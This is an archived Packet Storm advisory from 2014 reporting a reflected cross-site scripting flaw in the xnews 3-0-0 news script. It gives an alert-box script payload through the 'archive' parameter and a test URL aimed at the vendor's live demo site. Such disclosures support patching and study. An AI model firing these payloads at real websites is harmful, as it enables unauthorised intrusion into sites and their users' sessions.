xnews 3-0-0 Cross Site Scripting

2014-04-25T00:00:00
ID PACKETSTORM:126326
Type packetstorm
Reporter kurdish hackers team
Modified 2014-04-25T00:00:00

Description

                                        
                                            `===========================================================  
xnews3-0-0 XSS Vulnerability  
-----------------------------------------------------------  
foun by :kurd-team , Exploiter  
group : kurdish hackers team  
contact : pshela@yahoo.com  
site : kurdsystem.com  
-----------------------------------------------------------  
------------------------script-----------------------------  
-----------------------------------------------------------  
script :xnews3-0-0  
site :http://www.xpression-news.com  
download : http://www.xpression-news.com/downloads/xnews3-0-0RC2.zip  
-----------------------------------------------------------  
  
  
Exploit:  
--------  
  
Exmple:  
-------  
/path/index.php?archive="><script>alert('kurdsystem')</script>  
  
live teast :  
http://xpression-news.com/demos/xnews3-0-0/index.php?archive="><script>alert('kurdsystem')</script>  
-----------------------------------------------------------  
dyari bo hamu hackerani kurd :Zryan_kurd , all Member kurdsystem.com  
-----------------------------------------------------------  
`